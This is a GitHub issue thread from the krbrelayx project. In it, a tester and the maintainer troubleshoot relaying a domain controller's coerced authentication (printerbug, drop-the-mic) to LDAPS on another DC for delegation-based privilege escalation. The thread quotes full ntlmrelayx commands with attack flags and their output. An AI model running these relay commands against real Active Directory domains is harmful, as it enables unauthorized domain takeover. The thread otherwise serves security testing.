### ISSUE TITLE
Could not modify object, the server reports insufficient rights

### ISSUE THREAD

**Issue by Gilks** [dirkjanm/krbrelayx#12]
When relaying a `printerbug.py` connection from one domain controller to another I get to the end of the attack and am met with the following message:

> [-] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-03150E49, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

I attempted to perform the attack against ldap (specifying an existing computer account) and ldaps. I am led to believe that this means these domain controllers are not vulnerable and have likely been patched.

Is this assumption correct? I just wanted to double check because it seems odd that I can drop the mic successfully but cannot modify computer/user objects.

Either way- thanks for putting together these attacks!

**Comment by dirkjanm** [comment]
Did you use the `--delegate-access` flag? Normally DCs don't have special rights for ACL attacks but can modify delegation privileges on themselves.

**Comment by Gilks** [comment]
For the output I posted in the original post, I did not use the `--delegate-access` flag. During my original testing I used the `--delegate-access` flag as seen in the blog post. Here is the ntlmrelayx command and output:

> sudo ./ntlmrelayx.py -t ldaps://dc1 -smb2support --remove-mic --delegate-access 
... 
[*] Servers started, waiting for connections
[*] SMBD-Thread-3: Received connection from dc2, attacking target ldaps://dc1
[*] Authenticating against ldaps://dc1 as domain\dc2$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Attempting to create computer in: CN=Computers,DC=domain,DC=com
[-] Failed to add a new computer: {'dn': u'', 'referrals': None, 'description': 'insufficientAccessRights', 'result': 50, 'message': u'00000522: SecErr: DSID-03153067, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0\n\x00', 'type': 'addResponse'}
[-] User not found in LDAP: False
[-] User to escalate does not exist!

This is between two Windows Server 2012 R2 Standard 9600 domain controllers.

**Comment by dirkjanm** [comment]
Your second command should work if you use the `--escalate-user` flag and specify an existing computer account. Right now it fails because the DC can't add a new computer account. The relaying succeeds so the DC is vulnerable to drop-the-mic in this case. The error from your first post is likely due to you not specifying the `--delegate-access` flag, but I don't know which parameters you used so I'm not 100% sure.

**Comment by Gilks** [comment]
Is it possible that permissions can be modified in some way to prevent the DCs from performing the attack? Here's the output using `--escalate-user` and `--delegate-access`. I tried swapping `existing_computer$` for three different assets.

In the name of science, I also tried swapping to a different set of DCs altogether. Each test has yielded the same results.

```
sudo ./ntlmrelayx.py -t ldaps://DC1 -smb2support --remove-mic --escalate-user existing_computer$ --delegate-access
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

...

[*] Servers started, waiting for connections
[*] SMBD-Thread-3: Received connection from DC2, attacking target ldaps://DC1
[*] Authenticating against ldaps://DC1 as domain/DC2$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] SMBD-Thread-5: Received connection from DC2, attacking target ldaps://DC1
[-] Authenticating against ldaps://DC1 as \ FAILED
[*] SMBD-Thread-6: Received connection from DC2, attacking target ldaps://DC1
[-] Authenticating against ldaps://DC1 as \ FAILED
[-] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-03150E49, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

```

**Comment by sho-luv** [comment]
Was this sorted out?

**Comment by Gilks** [comment]
It was not. I circled back to test this a few months after this issue was opened and was unable to get the same behavior. I assume a patch was deployed at some point.
